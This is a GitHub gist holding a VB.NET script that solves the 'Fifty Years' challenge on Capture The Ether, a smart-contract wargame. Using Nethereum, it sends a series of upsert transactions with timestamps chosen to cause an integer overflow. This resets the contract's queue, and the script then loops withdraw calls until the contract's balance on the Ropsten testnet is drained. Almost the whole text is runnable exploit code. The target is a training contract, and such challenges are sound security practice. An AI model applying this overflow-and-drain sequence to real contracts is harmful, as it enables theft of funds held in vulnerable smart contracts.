Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
Exploit Sequence for Fifty Years challenge on Capture The Ether
Private Async Sub testContract()
Dim privateKey As New Nethereum.Signer.EthECKey("<enterprivatekeyhere>")
Dim account = New Nethereum.Web3.Accounts.Account(privateKey)
' ABI and bytecode of the deployed contract
Dim abi = "[{""constant"":false,""inputs"":[{""name"":""index"",""type"":""uint256""}],""name"":""withdraw"",""outputs"":[],""payable"":false,""stateMutability"":""nonpayable"",""type"":""function""},{""constant"":false,""inputs"":[{""name"":""index"",""type"":""uint256""},{""name"":""timestamp"",""type"":""uint256""}],""name"":""upsert"",""outputs"":[],""payable"":true,""stateMutability"":""payable"",""type"":""function""},{""constant"":true,""inputs"":[],""name"":""isComplete"",""outputs"":[{""name"":"""",""type"":""bool""}],""payable"":false,""stateMutability"":""view"",""type"":""function""},{""inputs"":[{""name"":""player"",""type"":""address""}],""payable"":true,""stateMutability"":""payable"",""type"":""constructor""}]"
Dim iweb3 = New Web3(account, "https://ropsten.infura.io/")
' contract address - Get contract
Dim tokenContractAddress = "0x4723B3521e0f62F48527C3E1C022F95bd1223E52"
Dim tokencontract = iweb3.Eth.GetContract(abi, tokenContractAddress)
Dim gas As New HexBigInteger(100000)
Dim value As New HexBigInteger(0)
Dim gasPrice As New HexBigInteger(5000000000)
Dim maxUIntMinusOneDay As BigInteger = BigInteger.Parse("115792089237316195423570985008687907853269984665640564039457584007913129553536")
Dim setZero As UInt32 = 0
Dim set86400 As UInt32 = 86400
Dim sentValue As UInt32
Dim upsert = tokencontract.GetFunction("upsert")
Dim transactionHash As Object
'first upsert - 1,115792089237316195423570985008687907853269984665640564039457584007913129553536
'send one wei, prepare to overflow timestamp
value = New HexBigInteger(1) '1 wei
sentValue = value.Value
transactionHash = Await upsert.SendTransactionAndWaitForReceiptAsync(account.Address, gas, gasPrice, value, , sentValue, maxUIntMinusOneDay)
'second upset - 2,0
'send two wei
value = New HexBigInteger(2)
sentValue = value.Value
transactionHash = Await upsert.SendTransactionAndWaitForReceiptAsync(account.Address, gas, gasPrice, value, , sentValue, setZero)
'third upsert
value = New HexBigInteger(3)
sentValue = value.Value
transactionHash = Await upsert.SendTransactionAndWaitForReceiptAsync(account.Address, gas, gasPrice, value, , sentValue, set86400)
'fourth upsert
'prepare to overflow timestamp again
value = New HexBigInteger(4)
sentValue = value.Value
transactionHash = Await upsert.SendTransactionAndWaitForReceiptAsync(account.Address, gas, gasPrice, value, , sentValue, maxUIntMinusOneDay)
'fifth upsert
'send 5 wei, set timestamp to 0, which sets head to zero, then we can withdraw bulk of the eth held by the contact
value = New HexBigInteger(5)
sentValue = value.Value
transactionHash = Await upsert.SendTransactionAndWaitForReceiptAsync(account.Address, gas, gasPrice, value, , sentValue, setZero)
Dim withdraw = tokencontract.GetFunction("withdraw")
sentValue = 3
value = New HexBigInteger(0)
'withdraw on index 3
transactionHash = Await withdraw.SendTransactionAndWaitForReceiptAsync(account.Address, gas, gasPrice, value, , sentValue)
'now we no longer need to send ether with our transactions
'check how much balance is left, and loop accordingly (balance - 1)
Dim balance = Await iweb3.Eth.GetBalance.SendRequestAsync(tokenContractAddress)
Dim i As Integer = 0
value = New HexBigInteger(0)
sentValue = value.Value
While i < balance.Value
' prepare to overflow timestamp, overflow so it expires, then withdraw 1 wei. Repeat till empty.
value = New HexBigInteger(0)
sentValue = value.Value
Await upsert.SendTransactionAndWaitForReceiptAsync(account.Address, gas, gasPrice, New HexBigInteger(0), , 0, maxUIntMinusOneDay)
Await upsert.SendTransactionAndWaitForReceiptAsync(account.Address, gas, gasPrice, New HexBigInteger(0), , 0, setZero)
Await withdraw.SendTransactionAndWaitForReceiptAsync(account.Address, gas, gasPrice, value, , sentValue)
i += 1
End While
balance = Await iweb3.Eth.GetBalance.SendRequestAsync(tokenContractAddress)
If balance.Value = 0 Then
Debug.Print("Finally!")
End If
End Sub
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.